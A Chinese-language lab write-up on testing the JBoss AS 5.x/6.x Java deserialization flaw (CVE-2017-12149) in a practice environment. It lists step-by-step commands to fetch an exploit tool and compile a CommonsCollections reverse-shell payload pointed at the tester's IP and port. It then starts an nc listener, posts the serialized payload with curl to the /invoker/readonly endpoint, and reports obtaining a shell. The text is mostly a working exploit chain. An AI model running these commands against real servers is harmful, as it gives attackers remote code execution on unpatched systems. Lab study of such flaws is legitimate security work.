本文主要記錄一下JBOSSAS 5.x/6.x 反序列化命令執行漏洞的測試過程
僅供學習
文中利用到漏洞環境由phith0n維護: JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
靶機地址:192.168.1.102 服務端口:8080
測試機: 192.168.1.100
搭建好環境,訪問地址:http://192.168.1.102:8080/ 及 http://192.168.1.102:8080/invoker/readonly
響應碼500,證明漏洞存在。
下載漏洞利用工具: http://scan.javasec.cn/java/JavaDeserH2HC.zip
編譯:(需要java環境)
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
運行:
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //反彈shell的IP和端口
starnight:JavaDeserH2HC starnight$ javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java starnight:JavaDeserH2HC starnight$ java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.1.100:1337 Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser
這樣就會將序列化對象保存在ReverseShellCommonsCollectionsHashMap.ser中,用curl命令發送到Jboss服務地址。
先在測試機運行nc命令,進入監聽模式:
starnight:temp starnight$ nc -lvv 1337
再打開另一個控制台,運行如下curl命令:
starnight:JavaDeserH2HC starnight$ curl -v http://192.168.1.102:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
運行截圖:
左側是獲取到shell,並執行命令。右側是用curl命令運行截圖。
References
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用